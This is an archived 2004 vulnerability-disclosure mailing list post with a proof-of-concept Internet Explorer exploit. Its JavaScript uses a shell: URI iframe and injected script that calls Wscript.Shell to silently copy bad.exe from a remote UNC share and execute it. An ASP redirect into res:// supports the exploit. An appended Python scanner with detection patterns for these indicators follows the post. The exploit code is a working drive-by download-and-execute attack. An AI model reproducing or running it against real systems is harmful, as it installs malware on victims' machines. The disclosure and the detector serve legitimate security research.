IE Shell URI Download and Execute, POC

From: Ferruh Mavituna (ferruh_at_mavituna.com)
Date: 07/14/04

    To: <vuln-dev@securityfocus.com>
    Date: Wed, 14 Jul 2004 11:53:13 +0300
    
    

    Hello;

    The code is based on the http://www.securityfocus.com/archive/1/367878
    message (POC by Jelmer). I just added a new feature, "download", and then
    execute the application. Also, I use Wscript.Shell in JavaScript instead of
    Shell.Application.

    1- copy \\IPADDRESS\NULLSHAREDFOLDER\bad.exe (stealth)
    2- Wait for download
    3- Execute bad.exe (stealth)

    New shellscript.js
    =====================================================
    function injectIt() {
        document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER> var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var e="%comspec% /c copy "+rF+" "+wF; var err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
    }
    document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
    setTimeout("injectIt()", 1000);
    =====================================================

    Also, for testing on IIS servers, the ASP equivalent of redir.jsp:

    redir.asp
    =====================================================
    <%
    Response.Expires = 1
    Response.Expiresabsolute = Now() - 1
    Response.AddHeader "pragma","no-cache"
    Response.AddHeader "cache-control","private"
    Response.CacheControl = "no-cache"
    For x = 1 to 500000 'Time
       z = z + 10
    Next

    Response.Status = "302 Found"
    Response.AddHeader "Content-Length", "4"
    Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
    %>
    =====================================================

    Download All Files : http://ferruh.mavituna.com/exploits/fm_ieshell.zip
    Online URL : http://ferruh.mavituna.com/article/?553

    Ferruh.Mavituna
    http://ferruh.mavituna.com
    PGPKey : http://ferruh.mavituna.com/PGPKey.asc
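As an added defensive example (not part of Ferruh's post or the referenced POC), a small Python scanner that flags the static indicators of this technique in captured page content and response headers. The indicator names, the detection thresholds and the sample inputs are constructed for this example.

```python
import re

# Static indicators for the IE local-zone injection pattern the post describes.
# Indicator names are this example's own labels; the post does not define them.
INDICATORS = {
    "shell_uri_iframe": re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?\s*shell:', re.I),
    "cross_frame_inject": re.compile(r'frames\[\d+\]\.document\.[\w.]*insertAdjacentHTML', re.I),
    # \\? tolerates quotes escaped inside a nested string, as in injected markup
    "scripting_shell_object": re.compile(
        r'ActiveXObject\s*\(\s*\\?["\'](?:wscript\.shell|shell\.application)\\?["\']', re.I),
    "comspec_copy": re.compile(r'%comspec%[^;]*\bcopy\b', re.I),
    "unc_executable": re.compile(r'\\{2,}[\w.-]+(?:\\+[\w.-]+)+\.(?:exe|scr|com|bat|cmd)', re.I),
}
# Redirect targets that land the navigating frame in a privileged local zone.
LOCAL_ZONE_LOCATION = re.compile(r'^\s*(?:URL:)?(?:res|shell|file):', re.I)

def scan_html(content: str) -> list:
    """Return the sorted names of every indicator that fires on the document text."""
    return sorted(name for name, pat in INDICATORS.items() if pat.search(content))

def is_suspicious(content: str) -> bool:
    """Alert only when a local-zone pivot (shell: iframe or cross-frame injection)
    is paired with a scripting-shell object; either half alone is weak evidence."""
    hits = set(scan_html(content))
    pivot = {"shell_uri_iframe", "cross_frame_inject"} & hits
    return bool(pivot) and "scripting_shell_object" in hits

def check_redirect_headers(headers: dict) -> bool:
    """True when a 3xx response redirects into res://, shell: or file: (the redir.asp trick)."""
    status = str(headers.get("Status", headers.get("status", "")))
    location = str(headers.get("Location", headers.get("location", "")))
    return status.startswith("3") and bool(LOCAL_ZONE_LOCATION.match(location))

# Constructed samples: a stripped-down page following the post's structure, and a benign one.
SUSPECT_PAGE = (
    '<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>'
    '<script>function f(){document.frames[0].document.body.insertAdjacentHTML("afterBegin",'
    '"<script DEFER>var o=new ActiveXObject(\\"wscript.shell\\");</script>");}</script>'
)
BENIGN_PAGE = (
    '<iframe src="https://example.test/widget"></iframe>'
    '<script>document.getElementById("x").insertAdjacentHTML("afterBegin","<b>hi</b>");</script>'
)
SUSPECT_HEADERS = {"Status": "302 Found", "Location": "URL:res://shdoclc.dll/HTTP_501.htm"}
BENIGN_HEADERS = {"Status": "302 Found", "Location": "https://example.test/login"}

if __name__ == "__main__":
    print(scan_html(SUSPECT_PAGE), is_suspicious(SUSPECT_PAGE))
    print(scan_html(BENIGN_PAGE), is_suspicious(BENIGN_PAGE))
    print(check_redirect_headers(SUSPECT_HEADERS), check_redirect_headers(BENIGN_HEADERS))
```

Run it over a proxy capture or a saved page; the header check is the server-side half (the 302 into res://) and the content check is the client-side half.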

